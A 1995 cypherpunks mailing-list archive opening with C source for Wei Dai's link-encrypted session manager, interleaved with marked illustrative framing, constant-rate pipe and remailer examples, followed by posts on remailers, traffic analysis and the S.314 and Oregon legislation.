	   		sloutstate=SL_START;
	   	break;
	    case SL_GOT2:
	   	if (obuf==0177)
	   		sloutstate=SL_GOT3;
	   	else {
	   		bwrite(stdout, &obuf, 1);
	   		sloutstate=SL_START;
	   	}
	   	break;
	    case SL_GOT3:
	   	if (obuf=='~')
	   		sloutstate=SL_GOT4;
	   	else {
	   		bwrite(stdout, &obuf, 1);
	   		sloutstate=SL_START;
	   	}
	   	break;
	    case SL_GOT4: /* key size indicator */
	   	bwrite(stdout, &obuf, 1);
	   	if (obuf=='S') {
	   		initslkey(SHORT);
	   		sloutstate=SL_KEYING;
	   	} else if (obuf=='M') {
	   		initslkey(MEDIUM);
	   		sloutstate=SL_KEYING;
	   	} else if (obuf=='L') {
	   		initslkey(LONG);
	   		sloutstate=SL_KEYING;
	   	} else
	   		sloutstate=SL_START;
	   	break;
	    case SL_KEYING:
	   	if (strchr("0123456789abcdef:",obuf) != NULL) {
	   		slkeyin(obuf);
	   	} else {
	   		bwrite(stdout,"U",1);
	   		sloutstate=SL_START;
	   	}
	   	break;
	    case SL_CRYPT:
	   	if (strchr("0123456789abcdef!",obuf) != NULL) {
	   		bad=0;
	   		if ((c = cipherout(obuf))>=0) {
	   			ch=c;
                                if (ch!=filler)
		   			bwrite(stdout,&ch,1);
	   		}
	   	} else if (bad++ > 8) {
	   		fprintf(stderr,"\r\nEncrypted session terminated -");
	   		fprintf(stderr,"\r\npress enter for CLEARTEXT mode: ");
	   		waitenter();
	   		delkey();
	   		sloutstate=SL_START;
	   	} else
	   		ciphstate=0;
	   	break;
	    default:
	   	bwrite(stdout, &obuf, 1);
	   	break;
	}
}



doshell() 
{
	int t;

	/***
	t = open(_PATH_TTY, O_RDWR);
	if (t >= 0) {
		(void) ioctl(t, TIOCNOTTY, (char *)0);
		(void) close(t);
	}
	***/
	getslave();
	(void) close(master);
	(void) dup2(slave, 0);
	(void) dup2(slave, 1);
	(void) dup2(slave, 2);
	(void) close(slave);
	if (cmd==NULL)
		execl(shell, "sh", "-i", 0);
	else
		system(cmd);
	perror(shell);
	fail();
}

rawtty()
{

	struct termios sbuf;

        sbuf = tt;
        sbuf.c_iflag &= ~(INLCR|IGNCR|ICRNL|IXON);
        sbuf.c_oflag &= ~OPOST;
        sbuf.c_lflag &= ~(ICANON|ISIG|ECHO);
        sbuf.c_cc[VMIN] = 1;
        sbuf.c_cc[VTIME] = 0;
	(void) tcsetattr(0, TCSAFLUSH, &sbuf);
}

cookedtty()
{
	(void) tcsetattr(0, TCSAFLUSH, &tt);
}

fail()
{

	(void) kill(0, SIGTERM);
	done();
}

done()
{
	cookedtty();
	switch (mode) {
	    case REMOTE:
		if (state==CIPHER)
			printf("XXXXXXXXXXXXXXXX\n");
		printf("lesm remote ");
		break;
	    case LOCAL:
		printf("lesm local ");
		break;
	}
	printf("done\n");
	exit(0);
}

getmaster()
{
	char *pty, *bank, *cp;
	struct stat stb;

	pty = &line[strlen("/dev/ptyp")];
	for (bank = "pqrstuvwxyz"; *bank; bank++) {
		line[strlen("/dev/pty")] = *bank;
		*pty = '0';
		if (stat(line, &stb) < 0)
			break;
		for (cp = "0123456789abcdef"; *cp; cp++) {
			*pty = *cp;
			master = open(line, O_RDWR);
			if (master >= 0) {
				char *tp = &line[strlen("/dev/")];
				int ok;

				/* verify slave side is usable */
				*tp = 't';
				ok = access(line, R_OK|W_OK) == 0;
				*tp = 'p';
				if (ok) {
					(void) tcgetattr(0, &tt);
				    	(void) ioctl(0, TIOCGWINSZ, 
						(char *)&win);
					return;
				}
				(void) close(master);
			}
		}
	}
	fprintf(stderr, "Out of pty's\n");
	fail();
}

getslave()
{

	line[strlen("/dev/")] = 't';
	slave = open(line, O_RDWR);
	if (slave < 0) {
		perror(line);
		fail();
	}
	(void) tcsetattr(slave, TCSAFLUSH, &tt);
	(void) ioctl(slave, TIOCSWINSZ, (char *)&win);
	(void) setsid();
	(void) ioctl(slave, TIOCSCTTY, 0);
}

waitenter()
{
	unsigned char b;
	do {
		read(0,&b,1);
	} while (b!='\r');
	printf("\r\n");
}

sendhex(fp,c)
     FILE *fp;
     unsigned int c;
{
	static char buf[16];

	sprintf(buf,"%02x",c);
	bwrite(fp,buf,2);
}
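
The wire framing that the enclosure above uses for link encryption (two hex digits per byte, a '!' resync marker before every 8th byte, filler byte 31 dropped by the receiver), as an added example that is not part of Wei Dai's or Matt Blaze's code. The names frame_encode, frame_rx_char and frame_decode are hypothetical, and the cipher step is left out: the bytes passed in stand for what cfb8_encrypt() would produce.

```c
/* Added example: LESM-style hex framing only, no cipher. */
#include <stdio.h>
#include <string.h>

#define FILLER       31u   /* filler byte value, as in esm.c above */
#define RX_BYTE_NONE (-1)  /* character consumed, no byte produced yet */
#define RX_ABORT     (-2)  /* too much line noise: session is torn down */

struct frame_rx {
    int      have_hi;      /* 1 while the high nibble of a pair is held */
    unsigned hi;           /* held high nibble, already shifted left */
    unsigned bad;          /* consecutive non-protocol characters seen */
    unsigned bad_limit;    /* esm.c uses 8 on the local side, 16 remote */
};

/* Sender: two lowercase hex digits per byte, '!' before every 8th byte.
 * out must hold 2*n + n/8 + 2 chars. Returns the number of chars written. */
size_t frame_encode(const unsigned char *in, size_t n, char *out,
                    unsigned *count)
{
    static const char hex[] = "0123456789abcdef";
    size_t i, o = 0;

    for (i = 0; i < n; i++) {
        if (!(++*count % 8))
            out[o++] = '!';
        out[o++] = hex[in[i] >> 4];
        out[o++] = hex[in[i] & 0xf];
    }
    out[o] = '\0';
    return o;
}

/* Receiver: feed one wire character. Returns a byte value 0..255,
 * RX_BYTE_NONE, or RX_ABORT once bad_limit is exceeded. */
int frame_rx_char(struct frame_rx *rx, char ch)
{
    static const char digits[] = "0123456789abcdef";
    const char *p;

    if (ch == '!') {            /* resync marker: drop any half pair */
        rx->bad = 0;
        rx->have_hi = 0;
        return RX_BYTE_NONE;
    }
    p = (ch != '\0') ? strchr(digits, ch) : NULL;
    if (p == NULL) {            /* line noise: count it, drop half pair */
        rx->have_hi = 0;
        return (rx->bad++ > rx->bad_limit) ? RX_ABORT : RX_BYTE_NONE;
    }
    rx->bad = 0;
    if (!rx->have_hi) {
        rx->hi = (unsigned)(p - digits) << 4;
        rx->have_hi = 1;
        return RX_BYTE_NONE;
    }
    rx->have_hi = 0;
    return (int)(rx->hi | (unsigned)(p - digits));
}

/* Decode a whole wire string, dropping filler bytes as the receiver does.
 * Returns the payload length, or -1 if the session would be torn down. */
long frame_decode(const char *wire, unsigned bad_limit,
                  unsigned char *out, size_t cap)
{
    struct frame_rx rx = {0, 0, 0, 0};
    size_t n = 0;

    rx.bad_limit = bad_limit;
    for (; *wire; wire++) {
        int b = frame_rx_char(&rx, *wire);
        if (b == RX_ABORT)
            return -1;
        if (b < 0 || (unsigned)b == FILLER)
            continue;           /* no byte yet, or idle-link padding */
        if (n < cap)
            out[n++] = (unsigned char)b;
    }
    return (long)n;
}

int main(void)
{
    /* Constructed sample: keystrokes interleaved with idle filler. */
    unsigned char in[] = {31, 'l', 's', 31, ' ', '-', 'l', '\r', 31, 31};
    char wire[64];
    unsigned char out[64];
    unsigned count = 0;
    long n;

    frame_encode(in, sizeof in, wire, &count);
    printf("wire:    %s\n", wire);
    n = frame_decode(wire, 8, out, sizeof out);
    printf("payload: %ld bytes\n", n);

    /* Lose one hex digit: pairs are misaligned only until the next '!'.
     * The cipher layer (not shown) has to recover separately. */
    memmove(wire + 3, wire + 4, strlen(wire + 4) + 1);
    n = frame_decode(wire, 8, out, sizeof out);
    printf("after losing a digit: %ld bytes decoded\n", n);
    return 0;
}
```

Because the filler is in-band, a genuine byte 31 (Ctrl-_) in the session is discarded by the receiver along with the padding.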




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Thu, 9 Feb 95 18:43:40 PST
To: Cypherpunks@toad.com
Subject: Re: web pages sucking secrets from your hard drive
Message-ID: <v03001424ab6082e37022@[140.174.229.220]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:13 2/9/95, jltocher@CCGATE.HAC.COM wrote:

>While you're connected to your favorite Web page, it's also connected
>to you, and could be copying all sorts of information off your hard
>drive, say industry experts.

Wrong.

>In fact, it happened last year when
>Central Point Software used registration software developed by
>Pipeline Communications

Can you tell the difference between a web session and an installer?

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Thu, 9 Feb 95 23:12:39 PST
To: cypherpunks@toad.com
Subject: Re: Selection key crypto protocol trial balloon
Message-ID: <gate.as70Zc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Hal <hfinney@shell.portal.com>:
> Let me get straight where we are.  Rishab's concrete proposal was not an
> implementation, but rather a set of requirements.  There was no
> suggestion about any specific algorithms that would meet those
> requirements, right?  The question is whether any such algorithm could
> exist.

Right.

> It is hard for me to see how this could possibly work.  The message
> receiver sends this "selection key" to the intermediary, and that somehow
> pulls out the saved message, but in a form such that the intermediary
> doesn't recognize it.  And the intermediary himself can't tell exactly
> which message is produced.  But it is nevertheless exactly the message
> which was meant for this particular receiver.

It need not be the same information - i.e. if the encryption process adds 
enough noise to the message, the extraction process might be lossy, without 
any total loss for the receiver. This may be possible particularly if 
Fourier-style transforms are used, as the "selection key" could pick up 
less "frequencies" of a message than are stored at the intermediary.

> The thing is, the receiver does not have much more information than the
> intermediary.  

The same could be said of a private/public key pair. What is crucial is the
association between the keys.

This said, while I can imagine separate systems for the intermediary losing 
correlation between incoming and outgoing messages (eg - it's _really_ tough,
without fancy pattern recognition, to associate a JPEG with the original), 
and for generating three associated keys (secret splitting? something to do
with Brands' blind signatures?), I really can't imagine a way of putting it
all together. Someone will have to be inspired, as Diffie was...


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Martin ( frodo ) <g4frodo@cdf.toronto.edu>
Date: Thu, 9 Feb 95 16:23:46 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: S.314 on Web
Message-ID: <95Feb9.192339edt.2438@marvin.cdf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The text of S.314 (the pi bill, as Doug pointed out to me earlier
today -- why I didn't realise earlier...) is available at
	http://baldric.resnet.cornell.edu/frodo/s.314.txt.html
with a rapidly hypertextified version of Slowdog's text on what
the bill will do to American law at
	http://baldric.resnet.cornell.edu/frodo/s.314.changes.html

   If there are errors or omissions, please tell me. If the URLs
are wrong, the failsafe is my homepage,
	http://baldric.resnet.cornell.edu/frodo/frodo.html
which has links to both. (Really. They're there. There's some
bumf about me. But the links are there.)

This may be useful to some. I find it handier to have it there
than in an odd text file lying around here.

frodo =)


Richard Martin    ChemPhysCompSci 9T7+PEY = 9T8   g4frodo@cdf.toronto.edu
Trinity College University of Toronto SVW92 martinrd@gpu.utcc.toronto.edu
My opinions, when not poached. (or fried) frodo@uhura.trinity.toronto.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 17:01:10 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502092258.RAA02881@libws2.ic.sunysb.edu>
Message-ID: <Pine.LNX.3.91.950209195950.9468A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> > prosecutions will stick. Arrests and prosecutions will take a financial 
> > toll on those targeted, and will create a chilling effect in the online 
> > community, meaning sysops and BBS operators will start policing 
> > themselves too severely in an effort to avoid political or legal scrutiny.
> 
> Exactly. It's already happening. I've noticed on local BBS's they are afraid
> of conversation about controversial subjects or files having to do with
> things like do-it-yourself-birth control methods, drug legalization, or
> crypto... some of the networks like RIME are also jittery about certain
> topics like crypto or how telephones work.

Which might mean the time is ripe for a sort of user-to-user and 
sysop-to-sysop outreach effort, an attempt to create a sort of solidarity 
amongst users of the various extant networks to stand together in 
supporting the free exchange of information.

> > broadcast paradigm, while the online world operates within the network 
> > paradigm. There are no hours in which it is safe to broadcast because 
> > there is no "broadcast" in the traditional sense.
> 
> Yes, I was discussing broadcasting. Scary thought is that because networks
> are different they will try to outright ban everything.

I wonder though sometimes if it's even occurred to lawmakers that they 
can't apply the safe harbor notion for indecency to computer networks.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 9 Feb 95 17:58:22 PST
To: Eric Merth <emerth@gpu.srv.ualberta.ca>
Subject: Re: So, what's it all about?
In-Reply-To: <199502100127.SAA82871@gpu2.srv.ualberta.ca>
Message-ID: <Pine.SUN.3.91.950209205700.28249A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Eric Merth wrote:

> Date: Thu, 9 Feb 1995 18:27:04 -0700 (MST)
> From: Eric Merth <emerth@gpu.srv.ualberta.ca>
> To: cypherpunks@toad.com
> Subject: So, what's it all about?
> 
> I went to a UNIX trade show yesterday, and the main speaker was a 
> security type. He talked about "the cypherpunks" among other things.
> He said you are really scary and dangerous and ...
> But of course he had to also project this address (cypherpunks@toad.com)
> on the screen.
> 
> So are you really scary and dangerous? What are the cypherpunks?

Only to totalitarian dictator types who want to control the flow and 
access to information.

Did he cite reasons for our scariness or just slander us generally?

> 
> Just curious,
> 
> -EWM
> 

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <dshayer@netcom.com> (David Shayer)
Date: Thu, 9 Feb 95 21:07:18 PST
To: cypherpunks@toad.com
Subject: Re: Not necessarily crypto but scary anyway...
Message-ID: <v02110101ab60a4d6d80d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>A friend advises me that today House Bill 666 passed. This supposedly would
>allow police officers to use evidence collected illegally if they 'believed'
>that it was collected in good faith.
>
>Any word on it?

Yes, this bill is real, and it passed the house resoundingly.  (I don't
know if the bill number is accurate.)  According to the NY Times, the
republicans have been trying to pass this for a long time, and now they
control congress.

Interestingly, the ATF and IRS are specifically excluded!  The bill was
opposed by both civil liberties groups and gun nuts.  (Hope I don't offend
too many gun nuts.)  The ATF was excluded as a sop to the NRA I suppose.


During debate, Rep. John Dingell (MI) called the ATF "jackbooted American
fascists."  Way to go John!

David


+------------------------------------------------------------------------+
|David Shayer                                 dshayer@netcom.com         |
|Sentient Software / Symantec                 shayer@applelink.apple.com |
|"Shoot Newt."                                                           |
+------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 9 Feb 95 18:48:28 PST
To: cypherpunks@toad.com
Subject: RE: a new way to do anonymity
Message-ID: <ab60837505021004ea5d@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:51 PM 02/09/95, Wei Dai wrote:
>It seems to me that if a user maintains a 24-hour a day pipe to an
>uncompromised server, then the method I described earlier against
>remailers should not work against that user.  Otherwise, some kind of
>in-out statistical analysis may work.

Ay, what a good point.  I know this connection is incredibly obvious, but
just in case no one has yet made it, I will.  A "pipe-net" host running
Wei's L- modification to Matt's ESM, which was also running a remailer,
would provide pretty much untraceable entrance to the remailer net.  The
remailer software wouldn't even need to be integrated with the pipe
software in any way, as long as the user had a secure connection to the
host, he could just connect to the SMTP port and send the message to the
remailer that way.

I would guess that the attack Wei described, as well as almost every other,
if not every other, traffic analysis attack would fail if users were
utilizing this.  You could trace the message to a given "pipe net" host
using traffic analysis, but you wouldn't be able to trace it to a user, if
he was using the pipe net appropriately.  Obviously, this also requires a
sufficient number of people to be using the pipe net host, so that no real
information is gained just by tracing the connection to a given pipenet
host.  And of course non-pipe-net users are using the remailer on the
machine too, which makes things a tiny bit more complicated for the traffic
analysts.

Note also that the bandwidth could be kept extremely low.  Even something
like 10cps.  So, maybe it takes you up to a couple hours to actually
transit your message to the pipe-net host remailer,  but we currently don't
expect instantaneous remailernet transmission anyway.  We've learned to
live with latency on the order of hours, as opposed to seconds, so adding
several more hours onto the chain isn't a problem.  And with a bandwidth
maintained that low, the pipenet host could theoretically host many many
"pipe net remailer" client users, without causing a serious problem.

This seems like a really exciting thing to me.  That we already have the
tools available for, right now at this very second, now that Wei has done
the link encryption mod to ESM.
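
The constant-rate pipe discussed in the message above, as an added example that is not part of the original post and is not LESM or ESM code. It shows why in/out timing analysis has nothing to correlate: one fixed-size cell leaves every tick whether or not mail is queued. The cell layout, the one-second tick and all function names are assumptions, and link encryption is not modelled (on a real pipe the length byte would sit under the link cipher).

```python
import os

CELL_PAYLOAD = 10               # bytes per tick: the "10cps" figure from the post
CELL_SIZE = 1 + CELL_PAYLOAD    # assumed layout: 1 length byte + payload/padding


def run_pipe(arrivals, ticks):
    """Emit exactly one fixed-size cell per tick, whether or not data is queued.

    arrivals maps tick -> bytes handed to the pipe at that tick (constructed input).
    Returns the cells sent and any bytes still waiting when the run stopped.
    """
    backlog = bytearray()
    cells = []
    for t in range(ticks):
        backlog += arrivals.get(t, b"")
        chunk = bytes(backlog[:CELL_PAYLOAD])
        del backlog[:CELL_PAYLOAD]
        padding = os.urandom(CELL_PAYLOAD - len(chunk))
        cells.append(bytes([len(chunk)]) + chunk + padding)
    return cells, bytes(backlog)


def receive(cells):
    """Host side: strip the padding and reassemble the byte stream."""
    return b"".join(c[1:1 + c[0]] for c in cells)


def observer_view(cells):
    """What a wiretapper can measure on an encrypted link: timing and size only."""
    return [(tick, len(c)) for tick, c in enumerate(cells)]


def ticks_to_send(nbytes):
    """Ticks (seconds, at one cell per second) needed to drain nbytes."""
    return -(-nbytes // CELL_PAYLOAD)


if __name__ == "__main__":
    msg = b"constructed remailer submission " * 4
    busy, _ = run_pipe({5: msg}, 30)
    idle, _ = run_pipe({}, 30)
    print(observer_view(busy) == observer_view(idle), receive(busy) == msg)
```
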






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Thu, 9 Feb 95 19:58:32 PST
To: cypherpunks@toad.com
Subject: Re: LESM - Link Encrypted Session Manager (3rd try)
Message-ID: <199502100354.WAA15146@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199502100243.AA03571@mail.eskimo.com>,
Wei Dai <weidai@eskimo.com> wrote:
>I tried to distribute LESM to the cypherpunks mailing list twice, and 
>neither of them made it to the nntp.hks.com list archive (my 
>later posts HAVE).  What is going on here?  This is a second repost.

nntp.hks.*net*.  hks.com is someone else.

We were off-line for several hours today, so it's possible that they're
still sitting in a mail queue somewhere.  Netcom is our denial of
service provider, colluding with NyNex... 'nuff said.
- - --
Todd Masco     | "Don't be too proud of this technological terror you've
cactus@hks.net |   constructed."        - Darth Vader   
     Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzrjMCoZzwIn1bdtAQF6rQF/e9K678EztVO+4lr/oH+POXVFZm4Eg8ao
4DqXfTkbQ+fpnWHacueth1/9xFrt8RJd
=s71u
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Thu, 9 Feb 95 22:57:19 PST
To: Hal <cypherpunks@toad.com
Subject: Re: MIME based remailing commands
Message-ID: <ab60b81304021004b962@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<SNIP my comments>
>Ah, I see how you are doing it.  Having re-read your docs, I gather
>that when un-armored the file is in an encrypted binary format, and
>when decrypted at least the non-header portion of the file is still
>binary?  I think this is a good way to do it; it addresses the point
>Eric made recently about size expansion when an armored file is
>encrypted at each step.
>
That is about right. Inside the armor is a bunch of binary data. 20 header
blocks, and the message block. The first message block is PGP encrypted
to the remailer, and contains the next destination. The other 19 headers,
and the message block are IDEA encrypted with a key and IV in the first
header. When decrypted, the second header is seen to be PGP encrypted to
the next remailer, and the rest is encrypted with the key in that header.
The remailer shifts up all the headers, sticks junk in the 20th header, and
rearmors the whole thing.

This is rather more active manipulation than the current remailers.


>The one thing I would mention is that "::" was not originally intended
>as an indication that the message was to be remailed.  Rather, this was
>simply a "header pasting token" which could be used to move a few lines
>from the body up into the header for those people who can't set header
>fields on outgoing mail.  Then the presence of "Anon-To:" or whatever
>in the header is what actually causes the action.  So you don't need to
>use "::", you can just set your headers directly and get the same
>effect.  (This is not to say you need to do it like this, just that
>that is how the original design that Eric created worked.)
>

I realize that. It was easy to implement, since I already had to check for
:: to be compatible with type 1 messages.

>If you did want to follow this model, you could think about using a
>MIME header to indicate the type of the message contents rather than
>the "::".  Another alternative would be to use a different special
>field in the mail header, like perhaps your "Remailer-Type: 2.0", but
>I'm not sure that a new top-level header field is the right place for
>this.  It looks to me like most of the standard headers deal more with
>moving the message around rather than with telling what would be done
>with it on receipt.  It's kind of a fine line but it looks to me like
>more of a job for a MIME content type since that is really what it is
>for.  You could use something like:
>
>MIME-Version: 1.0
>Content-Type: application/remail; version="2.0"
>
>or
>
>MIME-Version: 1.0
>Content-Type: application/remail-mark-2
>
>Then the rest of the message could look just as you have it.  Or, to use
>a little more of the existing standard, you could add:
>
>Content-Transfer-Encoding: base64
>
>and take out your BEGIN and END lines since it looks like you are using
>base64, although the augmented kind that PGP uses with the CRC at the
>end; you'd have to lose the CRC in that case.  (I wonder if PGP will do
>that in the MIME-PGP integration draft that is supposedly being worked
>on.)
>
>One question is, how do you actually send your messages in the
>mixmaster client and servers?  Do you go directly to sendmail, or do
>you use a user agent like /bin/mail?  If the former then it doesn't
>seem like it would be too hard to add these header fields.  On the
>receiving end then hopefully also it would not be much harder to match
>the Content-Type: string than the one you are using.
>
>The advantage, again, is that to a considerable extent this kind of
>application is exactly what MIME was planning for with the "application"
>content-type.  This lets you mark the contents of the message in a
>standard way.  And you are already using something very close to the
>base64 encoding that MIME specifies.  So this does seem like a good
>opportunity to go with the internet mainstream by following this
>standard.  If this seems like something you want to do I'm sure our MIME
>experts here can tell how to define a new content type.
>
>Hal
>

I agree that changing mixmaster to search for a MIME line, rather than the
:: would be no effort at all.

I use sendmail for the client and the remailer (actually they are the same
code), so adding new headers is easy. Unfortunately I am having some
problems with sendmail. Sendmail is marking the messages as "Apperently
To:" rather than "To:". Any idea what might cause that?

I am not sure I want to give up the CRC on the armor (esp. since I am using
the PGP tools routines and not my own), but I would be interested in
defining a new MIME content type. So, experts, what all is involved in
that, and is there any problem with starting to use a MIME type before it
is official?

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
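
The header handling described in the message above, worked through as an added example; this is not Mixmaster's code and not part of the original post. Only the 20 header slots and the open/decrypt/shift/junk sequence come from the post: the block sizes, field layout and names are assumptions, a SHA-256 XOR keystream stands in for IDEA, a per-remailer shared key stands in for PGP encryption to the remailer, and the armor step is left out.

```python
import hashlib
import os
import struct

NUM_HEADERS = 20                 # from the post
HEADER_SIZE = 128                # assumed for this example
BODY_SIZE = 512                  # assumed for this example
ADDR_LEN, KEY_LEN, IV_LEN, NONCE_LEN = 64, 16, 8, 8
REST_HEADERS = (NUM_HEADERS - 1) * HEADER_SIZE


def toy_stream(key, iv, data):
    """XOR data with a SHA-256 counter keystream (stand-in for IDEA, not for real use)."""
    out = bytearray()
    for off in range(0, len(data), 32):
        pad = hashlib.sha256(key + iv + struct.pack(">Q", off // 32)).digest()
        out.extend(b ^ p for b, p in zip(data[off:off + 32], pad))
    return bytes(out)


def seal_header(remailer_key, next_hop, key, iv):
    """Stand-in for 'PGP encrypted to the remailer': next hop plus the layer key and IV."""
    addr = next_hop.encode()
    if len(addr) > ADDR_LEN:
        raise ValueError("next hop address too long")
    plain = (addr.ljust(ADDR_LEN, b"\0") + key + iv).ljust(HEADER_SIZE - NONCE_LEN, b"\0")
    nonce = os.urandom(NONCE_LEN)
    return nonce + toy_stream(remailer_key, nonce, plain)


def open_header(remailer_key, header):
    """Recover (next hop, layer key, layer IV) from the first header slot."""
    plain = toy_stream(remailer_key, header[:NONCE_LEN], header[NONCE_LEN:])
    next_hop = plain[:ADDR_LEN].rstrip(b"\0").decode()
    key = plain[ADDR_LEN:ADDR_LEN + KEY_LEN]
    iv = plain[ADDR_LEN + KEY_LEN:ADDR_LEN + KEY_LEN + IV_LEN]
    return next_hop, key, iv


def build_packet(chain, remailer_keys, recipient, message):
    """Sender side: wrap one layer per remailer, innermost (last hop) first."""
    if not 1 <= len(chain) <= NUM_HEADERS:
        raise ValueError("chain must have 1..20 hops")
    if len(message) > BODY_SIZE - 2:
        raise ValueError("message too long for one packet")
    body = struct.pack(">H", len(message)) + message
    body += os.urandom(BODY_SIZE - len(body))
    headers = os.urandom(NUM_HEADERS * HEADER_SIZE)   # unused slots are random
    hops = list(chain) + [recipient]
    for i in reversed(range(len(chain))):
        key, iv = os.urandom(KEY_LEN), os.urandom(IV_LEN)
        top = seal_header(remailer_keys[chain[i]], hops[i + 1], key, iv)
        # The last slot falls off the end; the other 19 and the body go under this hop's key.
        rest = toy_stream(key, iv, headers[:REST_HEADERS] + body)
        headers, body = top + rest[:REST_HEADERS], rest[REST_HEADERS:]
    return headers + body


def remailer_process(my_key, packet):
    """One hop: open header 1, decrypt the rest, shift up, fill header 20 with junk."""
    if len(packet) != NUM_HEADERS * HEADER_SIZE + BODY_SIZE:
        raise ValueError("wrong packet size")
    next_hop, key, iv = open_header(my_key, packet[:HEADER_SIZE])
    rest = toy_stream(key, iv, packet[HEADER_SIZE:])
    shifted = rest[:REST_HEADERS] + os.urandom(HEADER_SIZE) + rest[REST_HEADERS:]
    return next_hop, shifted


def read_body(packet):
    """Final recipient: strip the length prefix and padding from the body block."""
    body = packet[NUM_HEADERS * HEADER_SIZE:]
    (length,) = struct.unpack(">H", body[:2])
    return body[2:2 + length]


def route(packet, first_hop, remailer_keys):
    """Drive the packet through the chain; record the size seen on each link."""
    hop, sizes = first_hop, [len(packet)]
    while hop in remailer_keys:
        hop, packet = remailer_process(remailer_keys[hop], packet)
        sizes.append(len(packet))
    return hop, read_body(packet), sizes


if __name__ == "__main__":
    keys = {name: os.urandom(16) for name in ("alpha", "beta", "gamma")}  # constructed
    pkt = build_packet(["alpha", "beta", "gamma"], keys, "rcpt@example.invalid", b"hello")
    print(route(pkt, "alpha", keys))
```

Because every hop drops one header and appends one junk block, the packet is the same size on every link, and each remailer learns only the next hop.
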






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 10 Feb 95 00:25:51 PST
To: cypherpunks@toad.com
Subject: stupid legislation in Oregon
Message-ID: <199502100806.AA02116@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Ugh. This has been a stupid week. Oregon House bill 2319 was introduced
by Rep. (Kevin?) Mannix on 1/16/95, and referred to the House committee
on Commerce on 1/18/95. Rep. Mannix has also introduced another bill, 
HB 2310, which "Creates the crime of electronically furnishing obscene
material to minors; punishes by maximum one year imprisonment,
$10,000 fine, or both." HB 2310 was introduced 1/13/95, and referred
to the House Judiciary committee on 1/16/95. 

He's introduced 38 bills so far this session - including others re
mandatory minimum sentencing for felony convictions, one which appears
to bar surrogate-pregnancy agreements, and another (HB2303) which 
prohibits physicians from performing artificial insemination on an
unmarried woman.

Damn this fucking state. I'll be on the phone with my representative
in the morning to see if I can find out more. Westlaw's legislative
tracking database doesn't have much information.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peterb@telerama.lm.com (Peter Berger)
Date: Thu, 9 Feb 95 21:15:50 PST
Subject: Re: Da Judge-L FAQ -- We are not Amused
In-Reply-To: <199502090712.XAA14865@alkahest.isas.com>
Message-ID: <3hesqj$cqn@ivory.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199502090712.XAA14865@alkahest.isas.com>,
